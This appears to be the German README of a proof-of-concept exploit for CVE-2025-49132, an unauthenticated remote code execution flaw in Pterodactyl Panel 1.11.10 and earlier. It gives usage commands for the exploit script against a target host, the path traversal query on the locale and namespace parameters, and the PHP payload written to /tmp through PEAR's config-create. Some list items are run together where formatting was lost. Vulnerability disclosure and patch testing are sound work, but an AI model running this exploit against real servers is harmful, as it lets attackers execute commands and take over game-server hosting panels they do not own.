
PoC-Exploit für CVE-2025-49132 (GHSA-24wv-6c99-f843) – Nicht authentifizierte Remote-Codeausführung in Pterodactyl Panel ≤ 1.11.10
Pterodactyl Panel – Nicht authentifizierte Remote-Codeausführung (RCE)
CVE‑2025‑49132 ist eine kritische Remote-Codeausführungs-Schwachstelle, die Pterodactyl Panel <= 1.11.10 betrifft.
Ein nicht authentifizierter Angreifer kann eine unsachgemäße Eingabevalidierung im Endpunkt /locales/locale.json ausnutzen, um beliebige Systembefehle auszuführen.
Behoben in Version: 1.11.11
Eine erfolgreiche Ausnutzung ermöglicht:
.env)Schweregrad: Kritisch
Die Schwachstelle besteht aufgrund einer unsachgemäßen Validierung von:
locale-Parameternamespace-ParameterEin Angreifer kann:
../../../../../)config-create ausnutzen/tmp schreibenSchwachstellenklassifizierung: CWE-94 -- Unsachgemäße Kontrolle der Codegenerierung
python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR
Standardpfad:
/usr/share/php/PEAR
Ermitteln Sie den richtigen Pfad über die Seite /phpinfo.php

Der Angreifer injiziert eine schädliche PHP-Payload in /tmp/payload.php mithilfe von:
/<?=system('id')?>+/tmp/payload.php
Durch den Aufruf:
?locale=../../../../../tmp&namespace=payload
führt der Server das injizierte PHP aus.

locale und namespace